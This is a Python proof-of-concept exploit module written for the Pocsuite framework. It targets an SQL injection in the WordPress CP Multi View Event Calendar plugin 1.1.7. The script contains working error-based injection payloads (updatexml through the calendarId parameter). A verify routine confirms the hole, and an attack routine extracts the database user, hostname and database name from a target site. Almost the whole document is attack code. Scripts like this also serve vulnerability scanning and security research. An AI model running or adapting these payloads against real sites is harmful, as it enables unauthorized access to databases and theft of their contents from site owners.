WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection

                                                #!/usr/bin/env python
# coding: utf-8

import re
from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '89309'  # vul ID
    version = '1'
    author = ['cnyql']
    vulDate = '2015-09-06'
    createDate = '2015-09-06'
    updateDate = '2015-09-10'
    references = ['http://www.sebug.net/vuldb/ssvid-89309']
    name = 'WordPress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection'
    appPowerLink = 'http://wordpress.org/'
    appName = 'CP Multi View Event Calendar'
    appVersion = '1.1.7'
    vulType = 'SQL Injection'
    desc = '''
    The SQL Injection vulnerabilities are located in the edit.php and datafeed.php files. Remote attackers are able to inject own sql commands to the vulnerable parameters value in these files GET/POST method request.
    '''

    def _verify(self):
        payload = '?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=2 and updatexml(1, concat(0x23, md5(3.14)), 1)'

        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload)
    
    def _attack(self):
        prefix = '?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=remove&rruleType=del_only&calendarId=2 and updatexml(1,concat(0x23, %s, 0x23),1)'

        payload1 = 'user()'
        res1 = req.get(urljoin(self.url, prefix % payload1), timeout=5)

        payload2 = 'database()'
        res2 = req.get(urljoin(self.url, prefix % payload2), timeout=5)

        res = (res1, res2)
        return self.parse_attack(res)
        
    def parse_verify(self, res, payload):
        output = Output(self)
        result = {}

        if '#4beed3b9c4a886067de0e3a094246f7' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output

    def parse_attack(self, res):
        output = Output(self)
        result = {}

        pattern = re.compile('#(.+?)#')
        match1 = pattern.search(res[0].content)
        if match1:

            result['Database'] = {}
            result['Database']['Username'], result['Database']['Hostname'] = match1.group(1).split('@')
            result['Database']['DBname'] = pattern.search(res[1].content).group(1)

            output.success(result)

        return output


register(TestPOC)